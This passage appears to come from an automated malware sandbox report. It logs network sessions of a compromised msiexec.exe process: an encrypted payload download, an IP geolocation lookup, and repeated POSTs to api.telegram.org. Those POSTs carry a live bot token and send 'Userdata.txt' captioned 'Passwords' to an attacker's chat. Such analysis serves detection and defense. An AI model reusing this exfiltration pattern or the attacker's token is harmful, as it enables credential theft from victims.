                                                                                                            Data Ascii: kIS< 0{^h~gabo/V2r[dAI8T-=]_lu2V`/L%"6xv|]w!C3iiFOq1<iNl=vY@2]!!{G0ne?c"UwS|rT
                                                                                                            2024-11-25 12:47:35 UTC1322INData Raw: b3 af e1 e4 61 11 c6 c5 49 23 99 59 d5 94 55 82 8c d9 a1 34 4d 46 29 8f b9 31 1e 0f a3 8a 8e 36 27 d7 ce 21 f1 00 d6 62 4d 1a 7c 1c 35 a8 ed a6 6c f7 f9 95 d3 2a 29 fa b0 58 b7 e8 70 4f 3c 63 3a 9a bb cd df 86 44 15 ff d3 90 e5 03 6b aa 5e 9f 54 c9 05 b8 a4 93 bd 2e 72 00 21 72 e1 bb 7e 3c a1 85 cd 0b 51 13 3e 08 02 ee 61 c4 38 31 ba 03 dd 2a 03 72 2e ba 60 28 df d8 64 68 4b 76 ce 9c 38 f6 bc 3a 9e 92 48 4e 98 27 8f b7 4c 33 56 c6 2c b9 bf f2 1b a1 21 09 9c 6c 6b 78 29 6e a0 e6 59 29 99 e8 cc 5d 84 f2 03 72 e2 08 ea 8e 2c 02 1a 89 36 0e 99 3c af e5 1b 79 c9 8a aa cc 1c 20 ab a2 f5 40 01 0f 51 9a dc c5 d1 c5 e2 5f 0e 3f 8c 47 4c 2f be 9c a3 98 63 4a c5 92 9b c6 08 a1 04 d4 c3 bb df 4f 25 0c a2 1c c3 a8 95 c8 23 50 3e 45 0a d5 ad c0 84 38 81 ac a8 0f 3c 59
                                                                                                            Data Ascii: aI#YU4MF)16'!bM|5l*)XpO<c:Dk^T.r!r~<Q>a81*r.`(dhKv8:HN'L3V,!lkx)nY)]r,6<y @Q_?GL/cJO%#P>E8<Y
                                                                                                            2024-11-25 12:47:35 UTC1390INData Raw: a1 8d 51 f5 cf fa 67 2f f9 70 b8 3d 50 ed 46 2b 33 bb bb 17 13 55 5b 2e bc 37 af d1 95 fe 12 af f8 97 bf c8 f0 c8 02 b0 7e cf cc 44 65 9a 7a 8a cc 1f b9 fa 0a 39 f9 70 5d f1 c8 c3 b9 4b fc d1 42 71 ee 8e cc 08 64 58 0d 09 23 45 b6 c9 e2 ec 04 c2 bf 1b 4e 86 59 44 4e 7a b7 d4 b6 24 33 79 ba 49 73 e1 b0 b8 2e 91 d4 d6 e6 e7 43 f9 51 51 21 a0 8a 6e 00 18 de 18 5b 4c cb ec 6b e7 8f 74 91 68 ef 0f a7 58 cb 85 2f e7 5d ee 0f f4 16 a4 13 3d bf e3 a5 8f ce b2 21 50 97 bd 37 b1 b6 3a db 57 9b 4f 3b 19 74 25 bf 50 e1 c7 32 9a 56 51 9b 31 bb a3 da bb 0a ee 4c 22 f3 53 9b 44 29 d0 45 0f 59 8f 86 4b 36 59 15 e0 a1 4f 9c c2 70 1a c9 26 7c 3e cd a4 3e 74 d2 00 16 1a 98 cc 7e 61 2f ea 65 24 51 8c ae 96 47 2f 2d e5 78 7a 00 80 73 7b 8d 0a d3 f2 1b f7 c6 a2 19 62 3b 26 34
                                                                                                            Data Ascii: Qg/p=PF+3U[.7~Dez9p]KBqdX#ENYDNz$3yIs.CQQ!n[LkthX/]=!P7:WO;t%P2VQ1L"SD)EYK6YOp&|>>t~a/e$QG/-xzs{b;&4
                                                                                                            2024-11-25 12:47:35 UTC1390INData Raw: 95 b7 7b 4c b5 16 54 2d 58 93 33 f7 d1 a3 8c ef 15 68 d2 b3 95 d0 47 81 9d 58 b7 7d 40 a6 b1 cc 87 69 48 d0 c8 ba f3 e0 0f 4a 03 37 b6 e2 1e 76 38 97 8e df 59 ca 55 be 32 0f c9 f9 cb c7 2d 8e 5e a5 21 21 7b 15 70 f4 b7 44 de ee a6 e2 ac 8b ee b8 85 a1 cf a5 6a 46 ea 7e f0 07 a1 be 82 bb 69 c6 93 9d e3 07 24 cd ed 4d 1d 91 db 3e eb 90 36 04 8d f1 21 45 f0 13 cb 25 d8 c1 f8 64 88 50 21 7b 5e 27 c1 dc d2 bd f5 07 8d 95 f3 68 43 c8 78 24 50 05 57 20 80 18 12 e9 6d 48 1d 1f 85 c4 38 c3 75 33 2c 32 67 61 97 ac 91 c0 70 ca 17 05 f7 87 fe 43 01 56 5a e4 ff 64 55 f8 18 e4 f8 61 d3 5f 5c af 90 36 b3 c5 6b 15 d6 88 a7 1a 34 13 9d 85 f9 3d 12 0b 6e 45 16 b4 39 82 ee 6d cf cf 91 7f 90 2f 8d 30 6e 2f ed 28 55 2d 8f 5f 2b d4 75 9e 64 93 99 28 2d b1 a3 dd 41 c7 33 72 62
                                                                                                            Data Ascii: {LT-X3hGX}@iHJ7v8YU2-^!!{pDjF~i$M>6!E%dP!{^'hCx$PW mH8u3,2gapCVZdUa_\6k4=nE9m/0n/(U-_+ud(-A3rb
                                                                                                            2024-11-25 12:47:35 UTC1390INData Raw: 35 36 20 61 ed 4f 90 12 6a c5 c4 ee 33 b0 72 79 6d fc 29 d4 98 09 8c 9e d9 a5 7c f5 90 37 b6 8e 71 c8 57 fc 09 37 6a 32 21 20 0a 79 4e ff c1 ff 0c 80 06 5c b4 f5 2a 84 58 2f fe 7e 2f aa 82 ec 91 5d 16 84 2e 77 1f 22 d9 58 15 17 b4 32 72 3e 40 84 1e 15 c4 ba 00 b1 29 26 c5 0a 4e f5 55 e7 b4 f5 08 83 6d c7 16 24 c3 11 38 ad 37 a1 30 ad 48 b6 87 37 8d cf 44 97 b7 a9 84 25 53 76 c9 94 cc 9b a7 57 2b 8e 19 5d a9 d8 1e b3 0c 69 61 14 a3 99 c4 12 a0 6b c6 5e 8e 82 54 74 e5 33 d1 97 ba 6f af 5b d0 c1 76 8b 90 93 f6 f7 33 55 12 76 20 6c c1 b9 fc 2f 2b ae 0e 73 5a 96 99 92 a1 4b b6 da e8 84 03 b5 0a e8 59 89 8f 32 89 4b ef 81 96 15 e7 5c 4f 3e b6 f5 b7 83 41 ee 6e ca 6c 09 54 61 05 d0 4b 9e d7 91 13 72 8c ed ef 40 f7 45 a9 3b da 02 41 b6 b3 8c 0d ca e6 4a 1e 45 c0
                                                                                                            Data Ascii: 56 aOj3rym)|7qW7j2! yN\*X/~/].w"X2r>@)&NUm$870H7D%SvW+]iak^Tt3o[v3Uv l/+sZKY2K\O>AnlTaKr@E;AJE
                                                                                                            2024-11-25 12:47:35 UTC1390INData Raw: ac 56 43 03 29 ae c2 c3 f7 a7 3a df 62 8e 0f 5b 97 dd 18 8d 00 b2 de d9 af 4c a8 b0 ce 32 31 41 0d aa c4 db 06 71 a8 68 3c c9 75 82 a3 ba c8 07 ea b2 c6 17 64 30 c3 61 1d d4 1c 9d 92 95 6c af a2 4f a0 83 86 f9 4d 2e 8d 76 7b 69 d8 32 8d 44 29 47 c3 84 65 4d 91 eb e6 cf 53 18 a7 5c 83 f7 c3 b5 85 e5 cc a8 21 c2 cf ac 21 9c d7 8b e9 18 93 8c dd 8b 64 36 0b 23 8f a2 e7 c4 17 ae 84 ed 84 25 d3 dc df f0 4a c5 67 5c 0c 60 19 2c 3f fb cc 66 f8 c5 8f cf 3c 41 92 f2 43 ba e8 19 c6 2f 65 26 a1 e8 e6 c2 90 43 02 e8 c9 e3 e3 54 0f a8 25 dd 57 d8 06 46 e6 fd dd 37 76 1d 2c 61 9d e6 a8 2f a2 ea 99 1a 57 28 cb 42 0f ff 6f c5 14 22 61 6b d0 11 56 66 59 b5 6a 28 db f0 b7 68 4b 7c a1 63 c7 0b bf 8d 61 6d c5 cf 34 d8 1f 42 9b 98 c0 39 d9 4a 15 1e e2 4f 90 da 6e 91 d5 cf d6
                                                                                                            Data Ascii: VC):b[L21Aqh<ud0alOM.v{i2D)GeMS\!!d6#%Jg\`,?f<AC/e&CT%WF7v,a/W(Bo"akVfYj(hK|cam4B9JOn
                                                                                                            2024-11-25 12:47:35 UTC1390INData Raw: 58 ae 49 e6 d1 0e 2e aa f3 78 db 61 35 5e 53 df 95 30 58 9f 41 5a 21 11 1d f7 f3 3a 1d d8 2b 75 ed bb 08 62 2e f3 08 90 2c 51 9d 23 e1 3c ad 27 02 59 42 24 f4 b6 4a d0 a3 26 ed 12 c0 b8 40 bd b3 91 6a 11 b3 1c cb de 4c 79 f7 74 b3 6d 17 91 f6 1a 31 e2 6f 39 e3 d1 c5 a2 48 2e 8b 4e 4a f3 87 8e e0 66 58 09 09 2c 3b 60 1f 6d f9 17 ce ab 20 e9 be 38 4c 4c 01 cf d8 a7 2d b8 6c c7 4a 63 eb ab a7 4f 39 d0 d7 ec fe 64 8f 8d 51 2b bb 96 68 87 64 a8 7f 43 46 93 86 b4 e7 85 56 83 97 ec 14 b9 25 3a 07 98 f8 3c 31 0f fe 61 c6 ed 3e aa ec ef 7d db b2 51 20 7b b1 35 c0 c9 c4 d8 33 f9 43 48 07 6b 3d a5 4c 3b c6 32 9a 6a a3 99 51 a0 ba 56 80 0c f6 2d 55 01 05 84 7d 31 2c 3d 03 06 9c 93 4b 22 71 c8 37 2e 50 94 d1 67 24 73 30 57 0d de ca 46 62 48 17 10 0d e4 de 68 0e fb fb
                                                                                                            Data Ascii: XI.xa5^S0XAZ!:+ub.,Q#<'YB$J&@jLytm1o9H.NJfX,;`m 8LL-lJcO9dQ+hdCFV%:<1a>}Q {53CHk=L;2jQV-U}1,=K"q7.Pg$s0WFbHh
                                                                                                            2024-11-25 12:47:36 UTC1390INData Raw: 52 cf 9f 41 41 8f 5a d0 b0 6b 39 b8 3b a8 21 33 88 0d 18 be df 91 94 76 fb 7e de 5d 81 85 b6 71 55 8a 09 42 05 97 bb e3 fd f9 eb 8c ef c2 f6 c2 a7 82 01 43 cd 9a 47 e3 3f 71 31 b6 c6 ac 69 4e e1 3d 56 3c c7 fa 93 fc 0d 43 33 e1 06 dc 68 73 bc b5 5a 4d 38 c7 fa 44 a7 26 38 a2 25 83 db de e0 84 fc 71 26 49 bc 0d 3e 44 17 78 6d 1b 51 70 9e 39 5c bf 75 1c 9a 3f 3d 57 53 7c f1 9f 16 6c c7 04 f8 d9 2c cf aa e2 00 05 8f 14 84 cb f0 64 5e 8f ba 0f 3b 30 dd 0f 10 0f 9b 7d 02 28 85 ac 64 25 26 3c eb 2e f1 66 e6 00 97 84 67 8f db af 80 d2 31 67 81 95 08 e1 1a ea e0 70 7c e7 d6 8a d2 d1 e5 73 83 60 59 7d 20 96 33 87 15 00 78 0b ad fe 82 e6 fb 0f f4 d4 d7 e0 11 2f 2f 2b a0 a9 c6 61 d8 45 2c 0b ea 29 6b 4c ef da fc 0a 97 06 35 e1 e7 9a 19 e4 58 ca dd 1b be 29 b1 62 ef
                                                                                                            Data Ascii: RAAZk9;!3v~]qUBCG?q1iN=V<C3hsZM8D&8%q&I>DxmQp9\u?=WS|l,d^;0}(d%&<.fg1gp|s`Y} 3x//+aE,)kL5X)b
                                                                                                            2024-11-25 12:47:36 UTC1390INData Raw: e4 54 48 44 45 80 fe 6f 1f a7 e0 0c 3a d2 92 9f 0d 7c ce 4d 9b f9 1f 26 6d 39 5c a8 52 6f 27 31 74 ea cf c3 01 7d d0 5d bd a9 b3 8d 86 78 d7 26 c0 eb 19 db 9e dd b0 f4 8d 99 6f 50 b8 17 c8 55 e7 19 be 0b 4a 9e 37 dc fe 7c f6 4f 97 0f a4 06 5c b4 64 6f 5f 4c b2 84 76 d8 71 84 2a 92 6d 01 5e 3c 63 00 39 c9 ee ce 3d 49 32 6d 1a 4d eb 59 04 dd 31 0b b9 20 aa d7 05 19 f5 51 fc 33 f6 de e7 7e dd 0d 3e f8 10 32 a4 b9 d7 61 f7 4a a7 93 a8 fd 96 5b 19 de 83 99 54 53 7c cd bb 0a f4 c2 51 3d 7a 0b 4a c1 37 05 8a 97 7b 64 05 b9 be a6 78 db 00 cc 5e 9b f4 40 1a 1a 39 af 9a bb 70 bd fe 85 c0 76 80 95 6b e9 69 76 44 0e 5b 57 74 f9 a5 f8 5d cb c7 26 8a 4b 90 82 99 66 c0 be cb ee 8f f6 af 14 c0 3b 98 96 10 23 5a eb 95 85 69 98 42 67 5c a7 f2 ce 80 51 eb 75 dd 0c 7a 51 60
                                                                                                            Data Ascii: THDEo:|M&m9\Ro'1t}]x&oPUJ7|O\do_Lvq*m^<c9=I2mMY1 Q3~>2aJ[TS|Q=zJ7{dx^@9pvkivD[Wt]&Kf;#ZiBg\QuzQ`


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.949865172.67.177.1344436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:39 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                            Host: reallyfreegeoip.org
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:47:40 UTC851INHTTP/1.1 200 OK
                                                                                                            Date: Mon, 25 Nov 2024 12:47:40 GMT
                                                                                                            Content-Type: text/xml
                                                                                                            Content-Length: 361
                                                                                                            Connection: close
                                                                                                            Cache-Control: max-age=31536000
                                                                                                            CF-Cache-Status: HIT
                                                                                                            Age: 502769
                                                                                                            Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                            Accept-Ranges: bytes
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j0zwZpUyCNPd1z2fuepbH1GsvY%2FKfZ4AxeaLCaXi0GdtZu8eQE3yz0v4DRCpzzUNpjFquR9RwDty3IAMQp2QX1mAXvn%2FX6lk8O0vZEW7UV1WzIm2xQM%2BhPEfo8TIydsvjHN19UeG"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8e81bfa4acdd7ced-EWR
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1966&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1454183&cwnd=179&unsent_bytes=0&cid=0981521a0259bdf0&ts=474&x=0"
                                                                                                            2024-11-25 12:47:40 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                            Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            3192.168.2.949871149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:42 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0d256fd4fb43
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:47:42 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 64 32 35 36 66 64 34 66 62 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0d256fd4fb43Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:47:43 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:47:42 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:47:43 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":638,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            4192.168.2.949881149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:46 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0d509daf7ed8
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:47:46 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 64 35 30 39 64 61 66 37 65 64 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0d509daf7ed8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:47:46 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:47:46 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:47:46 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":639,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            5192.168.2.949891149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:49 UTC293OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0d7a2473be4a
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
                                                                                                            Connection: Keep-Alive
                                                                                                            2024-11-25 12:47:49 UTC1089OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 30 64 37 61 32 34 37 33 62 65 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                            Data Ascii: --===============8dd0d7a2473be4aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                            2024-11-25 12:47:50 UTC388INHTTP/1.1 200 OK
                                                                                                            Server: nginx/1.18.0
                                                                                                            Date: Mon, 25 Nov 2024 12:47:50 GMT
                                                                                                            Content-Type: application/json
                                                                                                            Content-Length: 576
                                                                                                            Connection: close
                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                            2024-11-25 12:47:50 UTC576INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 33 35 38 33 38 38 30 36 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 55 64 65 6d 62 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 36 32 38 33 38 38 33 38 34 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 70 69 72 69 74 75 61 6c 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 5a 65 63 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 65 63 6f 5f 53 70 69 72 69 74 75 61 6c 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22
                                                                                                            Data Ascii: {"ok":true,"result":{"message_id":640,"from":{"id":7358388061,"is_bot":true,"first_name":"SpiritualUdemba","username":"SpiritualUdembabot"},"chat":{"id":6283883842,"first_name":"Spiritual","last_name":"Zeco","username":"zeco_Spiritual","type":"private"},"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            6192.168.2.949902149.154.167.2204436492C:\Windows\SysWOW64\msiexec.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-25 12:47:53 UTC269OUTPOST /bot7358388061:AAGqNbhvBub1VsNRNZAi8PtsoPKvVefq8k8/sendDocument?chat_id=6283883842&caption=user%20/%20Passwords%20/%208.46.123.75 HTTP/1.1
                                                                                                            Content-Type: multipart/form-data; boundary================8dd0d9de9eedfb2
                                                                                                            Host: api.telegram.org
                                                                                                            Content-Length: 1089
